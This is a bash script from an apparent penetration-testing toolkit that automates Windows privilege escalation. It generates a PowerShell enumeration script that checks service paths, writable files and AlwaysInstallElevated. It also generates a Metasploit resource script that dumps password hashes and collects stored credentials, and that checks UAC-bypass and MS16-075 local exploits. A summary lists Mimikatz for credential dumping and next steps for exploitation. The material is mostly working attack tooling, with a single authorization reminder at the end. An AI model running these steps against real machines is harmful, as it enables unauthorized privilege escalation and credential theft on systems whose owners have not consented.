#!/bin/bash
# GREYBOX Privilege Escalation Script - Windows
# Automated privilege escalation enumeration using WinPEAS and PowerShell

set -euo pipefail

OUTPUT_DIR="${1:-/root/workdir/scans/privesc}"
TARGET_HOST="${2:-}"

if [ -z "$TARGET_HOST" ]; then
    echo "Usage: $0 [output_dir] <target_host>"
    echo "Example: $0 /root/scans 192.168.1.100"
    exit 1
fi

mkdir -p "$OUTPUT_DIR"
TIMESTAMP=$(date +%Y%m%d_%H%M%S)

echo "╔═══════════════════════════════════════════════════════════╗"
echo "║     GREYBOX Privilege Escalation - Windows                  ║"
echo "╚═══════════════════════════════════════════════════════════╝"
echo ""
echo "Target: $TARGET_HOST"
echo "Output: $OUTPUT_DIR"
echo ""

# Download WinPEAS if not present
if [ ! -f "/root/tools/winPEAS.exe" ]; then
    echo "[*] Downloading WinPEAS..."
    wget -q https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASx64.exe -O /root/tools/winPEAS.exe
fi

# Generate PowerShell privilege escalation script
cat > "$OUTPUT_DIR/windows_privesc_${TIMESTAMP}.ps1" <<'PSEOF'
# Windows Privilege Escalation Enumeration Script
# Generated by GREYBOX Security Platform

Write-Host "╔═══════════════════════════════════════════════════════════╗"
Write-Host "║     Windows Privilege Escalation Enumeration              ║"
Write-Host "╚═══════════════════════════════════════════════════════════╝"
Write-Host ""

# System Information
Write-Host "[+] Gathering system information..."
systeminfo | Out-File -FilePath "C:\Temp\systeminfo.txt"
Get-ComputerInfo | Out-File -FilePath "C:\Temp\computerinfo.txt"

# User Information
Write-Host "[+] Gathering user information..."
whoami /all | Out-File -FilePath "C:\Temp\whoami.txt"
net user | Out-File -FilePath "C:\Temp\users.txt"
net localgroup administrators | Out-File -FilePath "C:\Temp\admins.txt"

# Process Information
Write-Host "[+] Gathering process information..."
Get-Process | Out-File -FilePath "C:\Temp\processes.txt"
tasklist /v | Out-File -FilePath "C:\Temp\tasklist.txt"

# Service Information
Write-Host "[+] Gathering service information..."
Get-Service | Out-File -FilePath "C:\Temp\services.txt"
sc query | Out-File -FilePath "C:\Temp\sc_query.txt"

# Scheduled Tasks
Write-Host "[+] Gathering scheduled tasks..."
schtasks /query /fo LIST /v | Out-File -FilePath "C:\Temp\schtasks.txt"

# Network Information
Write-Host "[+] Gathering network information..."
ipconfig /all | Out-File -FilePath "C:\Temp\ipconfig.txt"
netstat -ano | Out-File -FilePath "C:\Temp\netstat.txt"

# Registry - AutoRuns
Write-Host "[+] Checking AutoRun registry keys..."
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" | Out-File -FilePath "C:\Temp\autorun_hklm.txt"
Get-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" | Out-File -FilePath "C:\Temp\autorun_hkcu.txt"

# Installed Software
Write-Host "[+] Gathering installed software..."
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Out-File -FilePath "C:\Temp\installed_software.txt"

# File Permissions
Write-Host "[+] Checking writable directories in Program Files..."
Get-ChildItem "C:\Program Files" -Recurse -ErrorAction SilentlyContinue | Where-Object {!$_.PSIsContainer} | ForEach-Object {
    $acl = Get-Acl $_.FullName -ErrorAction SilentlyContinue
    if ($acl.Access | Where-Object {$_.FileSystemRights -match "Write" -and $_.IdentityReference -match "Users"}) {
        $_.FullName
    }
} | Out-File -FilePath "C:\Temp\writable_program_files.txt"

# Unquoted Service Paths
Write-Host "[+] Checking for unquoted service paths..."
Get-WmiObject -Class Win32_Service | Where-Object {$_.PathName -notmatch '^"' -and $_.PathName -match ' '} | Select-Object Name, DisplayName, PathName | Out-File -FilePath "C:\Temp\unquoted_services.txt"

# AlwaysInstallElevated Registry Check
Write-Host "[+] Checking AlwaysInstallElevated registry..."
Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated -ErrorAction SilentlyContinue | Out-File -FilePath "C:\Temp\always_install_elevated.txt"

Write-Host ""
Write-Host "[+] Enumeration complete!"
Write-Host "[+] Results saved to C:\Temp\"
Write-Host ""
PSEOF

echo "[*] PowerShell enumeration script generated: windows_privesc_${TIMESTAMP}.ps1"
echo ""
echo "To execute on target Windows machine:"
echo "  1. Transfer the script: scp $OUTPUT_DIR/windows_privesc_${TIMESTAMP}.ps1 $TARGET_HOST:C:\\Temp\\"
echo "  2. Execute: powershell -ExecutionPolicy Bypass -File C:\\Temp\\windows_privesc_${TIMESTAMP}.ps1"
echo "  3. Transfer WinPEAS: scp /root/tools/winPEAS.exe $TARGET_HOST:C:\\Temp\\"
echo "  4. Execute WinPEAS: C:\\Temp\\winPEAS.exe > C:\\Temp\\winpeas_output.txt"
echo ""

# Generate Metasploit commands for Windows privilege escalation
cat > "$OUTPUT_DIR/metasploit_windows_privesc_${TIMESTAMP}.rc" <<'RCEOF'
# Metasploit Resource Script - Windows Privilege Escalation
# Generated by GREYBOX Security Platform

# Load post-exploitation modules
use post/multi/recon/local_exploit_suggester
set SESSION 1
run

use post/windows/gather/enum_patches
set SESSION 1
run

use post/windows/gather/enum_applications
set SESSION 1
run

use post/windows/gather/credentials/windows_autologin
set SESSION 1
run

use post/windows/gather/credentials/credential_collector
set SESSION 1
run

use post/windows/gather/smart_hashdump
set SESSION 1
run

# Check for specific privilege escalation vectors
use exploit/windows/local/bypassuac_eventvwr
set SESSION 1
check

use exploit/windows/local/ms16_075_reflection
set SESSION 1
check

use exploit/windows/local/always_install_elevated
set SESSION 1
check

echo "Privilege escalation enumeration completed"
RCEOF

echo "[*] Metasploit resource script generated: metasploit_windows_privesc_${TIMESTAMP}.rc"
echo ""
echo "To use with Metasploit:"
echo "  msfconsole -r $OUTPUT_DIR/metasploit_windows_privesc_${TIMESTAMP}.rc"
echo ""

# Generate summary
cat > "$OUTPUT_DIR/windows_privesc_summary_${TIMESTAMP}.txt" <<EOF
╔═══════════════════════════════════════════════════════════╗
║     Windows Privilege Escalation Summary                  ║
╚═══════════════════════════════════════════════════════════╝

Target: $TARGET_HOST
Timestamp: $TIMESTAMP

Files Generated:
- windows_privesc_${TIMESTAMP}.ps1 (PowerShell enumeration script)
- metasploit_windows_privesc_${TIMESTAMP}.rc (Metasploit resource file)

Common Windows Privilege Escalation Vectors:
1. Unquoted Service Paths
2. AlwaysInstallElevated Registry Key
3. Weak Service Permissions
4. DLL Hijacking
5. Token Impersonation
6. Kernel Exploits (MS16-075, MS17-010, etc.)
7. Stored Credentials (Registry, files)
8. UAC Bypass

Tools to Transfer to Target:
- WinPEAS.exe (/root/tools/winPEAS.exe)
- PowerUp.ps1 (PowerShell privilege escalation)
- Mimikatz.exe (Credential dumping)

Next Steps:
1. Transfer and execute PowerShell script
2. Transfer and execute WinPEAS
3. Review outputs for privilege escalation vectors
4. Attempt exploitation based on findings
5. Document successful privilege escalation path

⚠️  Remember: Always have authorization before exploiting!
EOF

echo "[+] Windows privilege escalation resources generated!"
echo "[+] Results saved to: $OUTPUT_DIR"
echo ""
cat "$OUTPUT_DIR/windows_privesc_summary_${TIMESTAMP}.txt"